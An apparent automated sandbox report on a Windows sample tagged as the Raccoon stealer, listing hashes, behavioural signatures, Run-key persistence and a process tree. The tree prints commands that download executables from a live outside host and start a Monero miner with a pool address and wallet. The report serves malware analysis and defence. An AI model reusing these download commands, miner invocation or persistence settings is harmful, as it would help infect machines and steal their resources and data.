Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 22:21
Static task
static1
General
-
Target
f04b77c60c896b33ed8fe286de3341fc3ffd0211a987435475dc7e9d0abcb0cc.exe
-
Size
346KB
-
MD5
df7952a5fc82dfb2e49ae81b6a1be135
-
SHA1
4f3a8cd939fbe37426efda7c88fbd2e49d8f8986
-
SHA256
f04b77c60c896b33ed8fe286de3341fc3ffd0211a987435475dc7e9d0abcb0cc
-
SHA512
96a495e5d30e66a236c0aea19daedf95b31f254e457647b6553f2d6cae117f0a6da2468550333fbae3ffa94d0960e2459d2259d3b4c2598efe49fc03e6c36f1a
Malware Config
Extracted
Family
raccoon
Version
1.8.4-hotfixs
rc4.plain
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 1700 created 2968 1700 WerFault.exe 81 -
LoaderBot executable 4 IoCs
resource yara_rule behavioral1/memory/3208-148-0x0000000000300000-0x0000000000746000-memory.dmp loaderbot behavioral1/memory/3208-149-0x0000000000300000-0x0000000000746000-memory.dmp loaderbot behavioral1/memory/3208-153-0x0000000000300000-0x0000000000746000-memory.dmp loaderbot behavioral1/memory/3208-154-0x0000000000300000-0x0000000000746000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 4028 WScript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 2596 extd.exe 1420 setup_c1.exe 776 extd.exe 876 setup_m1.exe 2000 extd.exe 3208 setup_e1.exe 1084 extd.exe 2968 setup_c1.exe 3568 Driver.exe -
resource yara_rule behavioral1/files/0x000500000001ab2b-120.dat upx behavioral1/files/0x000500000001ab2b-121.dat upx behavioral1/files/0x000500000001ab2b-126.dat upx behavioral1/files/0x000500000001ab2b-132.dat upx behavioral1/files/0x000500000001ab2b-147.dat upx -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup_e1.exe -
Obfuscated with Agile.Net obfuscator 5 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x000500000001ab30-124.dat agile_net behavioral1/files/0x000500000001ab30-127.dat agile_net behavioral1/memory/1420-138-0x00000000004B0000-0x00000000004BE000-memory.dmp agile_net behavioral1/memory/1420-139-0x00000000004B0000-0x00000000004BE000-memory.dmp agile_net behavioral1/files/0x000500000001ab30-171.dat agile_net -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup_m1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup_e1.exe" setup_e1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 876 setup_m1.exe 3208 setup_e1.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1420 set thread context of 2968 1420 setup_c1.exe 81 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1700 2968 WerFault.exe 81 -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 876 setup_m1.exe 876 setup_m1.exe 3208 setup_e1.exe 3208 setup_e1.exe 1420 setup_c1.exe 1420 setup_c1.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 1700 WerFault.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe 3208 setup_e1.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1420 setup_c1.exe Token: SeDebugPrivilege 876 setup_m1.exe Token: SeDebugPrivilege 3208 setup_e1.exe Token: SeRestorePrivilege 1700 WerFault.exe Token: SeBackupPrivilege 1700 WerFault.exe Token: SeDebugPrivilege 1700 WerFault.exe Token: SeLockMemoryPrivilege 3568 Driver.exe Token: SeLockMemoryPrivilege 3568 Driver.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 780 wrote to memory of 1352 780 f04b77c60c896b33ed8fe286de3341fc3ffd0211a987435475dc7e9d0abcb0cc.exe 69 PID 780 wrote to memory of 1352 780 f04b77c60c896b33ed8fe286de3341fc3ffd0211a987435475dc7e9d0abcb0cc.exe 69 PID 1352 wrote to memory of 4028 1352 cmd.exe 72 PID 1352 wrote to memory of 4028 1352 cmd.exe 72 PID 1352 wrote to memory of 2596 1352 cmd.exe 73 PID 1352 wrote to memory of 2596 1352 cmd.exe 73 PID 1352 wrote to memory of 2596 1352 cmd.exe 73 PID 1352 wrote to memory of 1420 1352 cmd.exe 74 PID 1352 wrote to memory of 1420 1352 cmd.exe 74 PID 1352 wrote to memory of 1420 1352 cmd.exe 74 PID 1352 wrote to memory of 776 1352 cmd.exe 75 PID 1352 wrote to memory of 776 1352 cmd.exe 75 PID 1352 wrote to memory of 776 1352 cmd.exe 75 PID 1352 wrote to memory of 876 1352 cmd.exe 77 PID 1352 wrote to memory of 876 1352 cmd.exe 77 PID 1352 wrote to memory of 876 1352 cmd.exe 77 PID 1352 wrote to memory of 2000 1352 cmd.exe 78 PID 1352 wrote to memory of 2000 1352 cmd.exe 78 PID 1352 wrote to memory of 2000 1352 cmd.exe 78 PID 1352 wrote to memory of 3208 1352 cmd.exe 79 PID 1352 wrote to memory of 3208 1352 cmd.exe 79 PID 1352 wrote to memory of 3208 1352 cmd.exe 79 PID 1352 wrote to memory of 1084 1352 cmd.exe 80 PID 1352 wrote to memory of 1084 1352 cmd.exe 80 PID 1352 wrote to memory of 1084 1352 cmd.exe 80 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 1420 wrote to memory of 2968 1420 setup_c1.exe 81 PID 3208 wrote to memory of 3568 3208 setup_e1.exe 84 PID 3208 wrote to memory of 3568 3208 setup_e1.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\f04b77c60c896b33ed8fe286de3341fc3ffd0211a987435475dc7e9d0abcb0cc.exe"C:\Users\Admin\AppData\Local\Temp\f04b77c60c896b33ed8fe286de3341fc3ffd0211a987435475dc7e9d0abcb0cc.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\246E.bat C:\Users\Admin\AppData\Local\Temp\f04b77c60c896b33ed8fe286de3341fc3ffd0211a987435475dc7e9d0abcb0cc.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21009\stt.vbs"3⤵
- Blocklisted process makes network request
PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exe "/download" "http://a0621298.xsph.ru/File.exe" "setup_c1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2596
-
-
C:\Users\Admin\AppData\Local\Temp\21009\setup_c1.exesetup_c1.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Users\Admin\AppData\Local\Temp\21009\setup_c1.exeC:\Users\Admin\AppData\Local\Temp\21009\setup_c1.exe4⤵
- Executes dropped EXE
PID:2968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 8405⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exe "/download" "http://a0621298.xsph.ru/512412.exe" "setup_m1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:776
-
-
C:\Users\Admin\AppData\Local\Temp\21009\setup_m1.exesetup_m1.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exe "/download" "http://a0621298.xsph.ru/RM.exe" "setup_e1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2000
-
-
C:\Users\Admin\AppData\Local\Temp\21009\setup_e1.exesetup_e1.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
-
C:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1084
-
-